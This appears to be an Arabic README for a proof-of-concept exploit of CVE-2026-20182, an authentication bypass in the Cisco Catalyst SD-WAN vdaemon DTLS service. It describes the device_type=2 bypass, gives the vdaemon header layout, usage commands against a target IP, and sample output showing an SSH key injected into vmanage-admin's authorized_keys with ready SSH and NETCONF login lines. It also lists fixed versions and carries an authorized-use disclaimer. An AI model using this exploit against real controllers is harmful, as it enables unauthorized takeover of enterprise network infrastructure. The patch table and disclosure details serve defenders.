
CVE-2026-20182 PoC - Cisco Catalyst SD-WAN Controller / Manager تجاوز المصادقة (CVSS 10.0)
استغلال إثبات مفهوم لـ CVE-2026-20182، وهو تجاوز مصادقة حرج (CVSS 10.0) في خدمة vdaemon DTLS (UDP/12346) على وحدة تحكم (vSmart) ومدير (vManage) Cisco Catalyst SD-WAN.
الإفصاح: 14 مايو 2026 بواسطة Rapid7 (Stephen Fewer & Jonah Burgess)
CISA KEV: أضيف في 14 مايو 2026 (توجيه الطوارئ 26-03)
CVSS: 10.0 — CWE-287: مصادقة غير صحيحة
تستخدم خدمة vdaemon مصافحة DTLS متعددة المراحل لمصادقة أقران مستوى التحكم. تقوم وظيفة vbond_proc_challenge_ack() بتنفيذ التحقق من الشهادة الخاص بنوع الجهاز — لكن نوع الجهاز 2 (vHub) لا يحتوي على مسار تحقق. إرسال CHALLENGE_ACK مع device_type=2 يتسبب في تجاوز الوظيفة لكل الشروط الشرطية وتعيين peer->authenticated = 1 بدون شروط.
لا حاجة لبيانات اعتماد صالحة، أو شهادة موقعة من CA، أو معرفة بنشر SD-WAN.
/home/vmanage-admin/.ssh/authorized_keys عبر MSG_VMANAGE_TO_PEER (msg_type=14)vmanage-adminpython3 cve-2026-20182.py -t <target> [options]
| Argument | الوصف |
|---|---|
-t, --target | عنوان IP الهدف أو اسم المضيف |
--port | منفذ vdaemon UDP (الافتراضي: 12346) |
--key-file | مسار لمفتاح SSH عام موجود لحقنه (اختياري) |
--netconf | التحقق من الاستغلال بالاتصال بـ NETCONF عبر SSH |
# إنشاء زوج مفاتيح جديد واستغلال
python3 cve-2026-20182.py -t 192.168.1.100
# استخدام مفتاح عام موجود
python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub
# استغلال والتحقق عبر NETCONF
python3 cve-2026-20182.py -t 192.168.1.100 --netconf
[*] استهداف 192.168.1.100:12346 (vdaemon DTLS)
[+] اكتملت مصافحة DTLS (تم استقبال msg_type=8، 1027 بايت)
[*] إرسال CHALLENGE_ACK مع device_type=2 (vHub) ...
[+] peer->authenticated = 1 (تم تجاوز المصادقة!)
[*] إرسال HELLO ...
[+] النظير في حالة UP (تم تجاوز مصافحة الاقتران بنجاح)
[*] حقن مفتاح SSH العام ...
[+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 [email protected]
[+] SSH: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa [email protected]
| الإصدار | الإصدار الثابت |
|---|---|
| < 20.9 | الانتقال إلى إصدار مدعوم |
| 20.9 | 20.9.9.1 |
| 20.10 | 20.12.7.1 |
| 20.11 | 20.12.7.1 |
| 20.12 | 20.12.5.4 / 20.12.6.2 / 20.12.7.1 |
| 20.13 | 20.15.5.2 |
| 20.14 | 20.15.5.2 |
| 20.15 | 20.15.4.4 / 20.15.5.2 |
| 20.16 | 20.18.2.2 |
| 20.18 | 20.18.2.2 |
| 26.1.1 | 26.1.1.1 |
cisco_sdwan_vhub_auth_bypass — وحدة مساعدة في إطار Metasploitرأس بروتوكول vdaemon هو 12 بايت:
| الإزاحة | الحجم | الحقل | ملاحظات |
|---|---|---|---|
| 0 | 1 | msg_type | الـ nibble المنخفض = النوع، الـ nibble المرتفع = الإصدار |
| 1 | 1 | device_info | الـ nibble المرتفع = device_type، الـ nibble المنخفض = flags |
| 2 | 1 | flags | القيمة القياسية 0xA0 |
| 3 | 1 | padding | دائماً 0x00 |
| 4-7 | 4 | domain_id | uint32 بنظام big-endian |
| 8-11 | 4 | site_id | uint32 بنظام big-endian |
أنواع الأجهزة: 1=vEdge، 2=vHub، 3=vSmart، 4=vBond، 5=vManage
openssl (لنقل DTLS)cryptography (pip install cryptography)يُقصد من هذا الاستغلال استخدامه فقط في عمليات الفريق الأحمر المصرح بها، واختبار الاختراق، والبحث الأمني على الأنظمة التي لديك إذن كتابي صريح لها. الاستخدام غير المصرح به غير قانوني.